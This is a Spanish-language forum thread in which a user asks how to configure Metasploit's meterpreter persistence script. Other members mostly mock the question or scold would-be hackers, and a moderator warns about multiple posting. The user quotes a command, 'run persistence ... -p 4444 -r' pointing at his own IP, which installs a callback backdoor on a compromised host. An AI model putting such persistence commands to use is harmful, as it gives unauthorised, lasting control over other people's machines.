script "persistence" en meterpreter

Iniciado por unknwn, 20 Febrero 2014, 08:23 AM

0 Miembros y 1 Visitante están viendo este tema.

unknwn

Alguien conoce los parametros mas efectivos a configurar para este script en msfconsole?

Gracias

Grillet0xEB

No es que sean los mas efectivos, depende de lo que quieras hacer buscas lo parametros que te convengan
Grillet0xEB ;)

engel lex

es que al no saber que haces, hay parámetros efectivos y no efectivos XD
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

.:UND3R:.

Intentaré dar mi punto de vista. Mestasploit Framework es una excelente recopilación de herramientas. Minimiza el proceso de recopilación de información y explotación, sin duda es increíble, no todo es msfconsole, se cuenta con múltiples comandos y utilidades que facilitan el proceso de creación de exploit, pero aquí el problema, su facilidad permite que caiga en manos de niños que no saben lo que están haciendo y peor aun ni lo que están diciendo, por favor si te quieres un poquito y no quieres ridiculizarte simplemente busca en google, nadie nace sabiendo y por eso mismo, pero antes que plantees una duda, debes al menos saber que estás herramienta estás usando, entender más menos su funcionalidad. Es muy cómico ver un sin fin de guías que ya considero graciosas. No es tu culpa pero quizás con este post me desquito con todo lo que he visto, muchas personas publicando tutoriales de como hackear, como hacer virus y un sin fin de cosas, algunos dicen:
"te bajas un programa llamado devc++ y pegas este código" otros como "escribes ifconfig y pegas los numeritos que te muestran el mensaje", es decir solo contaminan, expanden e incentivan ser lammer. Ser hacker es sencillo muy pero muy fácil y te apuesto que TÚ NO PUEDES NI PODRÁS SERLO por una sencilla razón. Un hacker será aquella persona visionaria con interés de aprender, con un espíritu aventuro, y encantado por la curiosidad del por qué de las cosas, ¿muy fácil y sencillo verdad?, pero para otros quizás más fácil es pegar palabras ilógicas en un foro, que peor aun terminan desprestigiando este magnífico foro, digamos que crees que plantear una duda con respecto a una línea de comando es hacking avanzado, entonces para ti que es, solventar una duda con respecto a un funcionamiento interno de una DLL?, una duda sobre una estructura puntual de un determinado lenguaje de programación, dudas con protocolos, fallos de seguridad?  :laugh:

Como anécdota intenté enseñarle mi vago conocimiento a una persona, y me llevé la más triste impresión, querer hackear juegos, robar dinero y contraseñas, cuando le mostré metasploit fue mi peor error de mi vida (luego de perder mi tiempo respondiendo este mensaje), ahora esa persona se cree hacker  :laugh: imagínate, por que sabe lo que es un payload y sabe usar el comando use exploit de metasploit cree que lanzar un exploit es algo básico y muy fácil.

Todas estas herramientas están hechas para facilitar el pentesting de gente que entiende lo que está haciendo, así que por favor no juegues con juguetes de grandes que te puedes lastimar.

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

unknwn

#4
Cita de: engelx en 23 Febrero 2014, 22:51 PM
es que al no saber que haces, hay parámetros efectivos y no efectivos XD

Te entiendo, solo abrí el post de esa manera para resumir.

He usado los siguientes parámetros:

run persistence -U -i 5 S -p 4444 -r "aca-mi-ip"

Pero solo sirve al conectar la primera vez, luego sin embargo se pierde la persistencia durante otras sesiones por lo que deduzco que podrían estar mal los parametros quizas.

Que otra posibilidad podria ser?




Cita de: MoonShadow en 23 Febrero 2014, 19:17
No es que sean los mas efectivos, depende de lo que quieras hacer buscas lo parametros que te convengan



Te entiendo, solo abrí el post de esa manera para resumir.

He usado los siguientes parámetros:

run persistence -U -i 5 S -p 4444 -r "aca-mi-ip"

Pero solo sirve al conectar la primera vez, luego sin embargo se pierde la persistencia durante otras sesiones por lo que deduzco que podrían estar mal los parametros quizas.

Que otra posibilidad podria ser?




Cita de: .:UND3R:. en Ayer a las 07:22
Intentaré dar mi punto de vista. Mestasploit Framework es una excelente recopilación de herramientas. Minimiza el proceso de recopilación de información y explotación, sin duda es increíble, no todo es msfconsole, se cuenta con múltiples comandos y utilidades que facilitan el proceso de creación de exploit, pero aquí el problema, su facilidad permite que caiga en manos de niños que no saben lo que están haciendo y peor aun ni lo que están diciendo, por favor si te quieres un poquito y no quieres ridiculizarte simplemente busca en google, nadie nace sabiendo y por eso mismo, pero antes que plantees una duda, debes al menos saber que estás herramienta estás usando, entender más menos su funcionalidad. Es muy cómico ver un sin fin de guías que ya considero graciosas. No es tu culpa pero quizás con este post me desquito con todo lo que he visto, muchas personas publicando tutoriales de como hackear, como hacer virus y un sin fin de cosas, algunos dicen:
"te bajas un programa llamado devc++ y pegas este código" otros como "escribes ifconfig y pegas los numeritos que te muestran el mensaje", es decir solo contaminan, expanden e incentivan ser lammer. Ser hacker es sencillo muy pero muy fácil y te apuesto que TÚ NO PUEDES NI PODRÁS SERLO por una sencilla razón. Un hacker será aquella persona visionaria con interés de aprender, con un espíritu aventuro, y encantado por la curiosidad del por qué de las cosas, ¿muy fácil y sencillo verdad?, pero para otros quizás más fácil es pegar palabras ilógicas en un foro, que peor aun terminan desprestigiando este magnífico foro, digamos que crees que plantear una duda con respecto a una línea de comando es hacking avanzado, entonces para ti que es, solventar una duda con respecto a un funcionamiento interno de una DLL?, una duda sobre una estructura puntual de un determinado lenguaje de programación, dudas con protocolos, fallos de seguridad?  

Como anécdota intenté enseñarle mi vago conocimiento a una persona, y me llevé la más triste impresión, querer hackear juegos, robar dinero y contraseñas, cuando le mostré metasploit fue mi peor error de mi vida (luego de perder mi tiempo respondiendo este mensaje), ahora esa persona se cree hacker   imagínate, por que sabe lo que es un payload y sabe usar el comando use exploit de metasploit cree que lanzar un exploit es algo básico y muy fácil.

Todas estas herramientas están hechas para facilitar el pentesting de gente que entiende lo que está haciendo, así que por favor no juegues con juguetes de grandes que te puedes lastimar.



zZzZZZZz.... tienes bastante tiempo para escribir

[MOD] NO se hace triple post, se usa el botón "modificar", para añadir comentarios.

unknwn

#5
Estimados Moderadores, creo que la apertura de este tema ha sido un fracaso, si quieren pueden borrarlo, ya que lo comenze sin sintetizar el problema en cuestion

Saludos